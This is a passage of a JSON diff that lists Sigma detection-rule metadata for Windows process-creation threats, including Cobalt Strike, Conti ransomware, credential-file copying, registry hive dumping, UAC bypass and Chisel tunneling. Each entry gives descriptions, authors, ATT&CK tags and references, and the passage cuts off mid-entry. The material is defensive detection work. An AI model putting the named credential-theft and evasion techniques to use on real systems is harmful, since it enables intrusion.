"b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "value": "F-Secure C3 Load by Rundll32" + }, + { + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certoc_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", + "value": "Suspicious Load DLL via CertOC.exe" + }, + { + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certutil_ntlm_coercion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/issues/243", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "value": "NTLM Coercion Via Certutil.exe" + }, + { + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_change_default_file_association.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ] + }, + "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "value": "Change Default File Association" + }, + { + "description": "Detects when a program changes the default file association of any extension to an executable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_change_default_file_assoc_susp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ] + }, + "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "value": "Change Default File Association To Executable" + }, + { + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "filename": "proc_creation_win_chisel_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "value": "Chisel Tunneling Tool Usage" + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "meta": { + "author": "Aedan Russell, frack113 (sigma)", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chrome_load_extension.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ] + }, + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker" + }, + { + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use (Should be investigated either way)" + ], + "filename": "proc_creation_win_cleanwipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "value": "CleanWipe Usage" + }, + { + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_clip.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP" + }, + { + "description": "Detects usage of cmdkey to look for cached credentials", + "meta": { + "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_cmdkey_recon.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.005" + ] + }, + "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "value": "Cmdkey Cached Credentials Recon" + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "proc_creation_win_cmd_delete.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File" + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/02/15", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline" + }, + { + "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_read_contents.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", + "value": "Read and Execute a File Via Cmd.exe" + }, + { + "description": "Use \">\" to redicrect information in commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cmd_redirect.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/syntax-redirection.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "value": "Redirect Output in CommandLine" + }, + { + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate admin scripts" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "value": "Suspicious CMD Shell Redirect" + }, + { + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "meta": { + "author": "Nik Seetharaman, Christian Burkard", + "creation_date": "2019/07/31", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_com_object_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "value": "CMSTP UAC Bypass via COM Object Access" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation" + }, + { + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands" + }, + { + "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules" + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32" + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns" + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2020/06/11", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "filename": "proc_creation_win_commandline_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal" + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/26", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conhost_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal" + }, + { + "description": "Conti ransomware command line ioc", + "meta": { + "author": "frack113", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ] + }, + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution" + }, + { + "description": "Detects a command used by conti to dump database", + "meta": { + "author": "frack113", + "creation_date": "2021/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_conti_sqlcmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "value": "Conti Backup Database" + }, + { + "description": "Detects the malicious use of a control panel item", + "meta": { + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/06/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_control_panel_item.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items" + }, + { + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "meta": { + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + ], + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ] + }, + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data" + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share" + }, + { + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crackmapexec_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns" + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ] + }, + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions" + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL" + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/10/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping" + }, + { + "description": "Detects Archer malware invocation via rundll32", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crime_fireball.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install" + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_crime_maze_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware" + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/26", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some build frameworks" + ], + "filename": "proc_creation_win_crypto_mining_monero.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 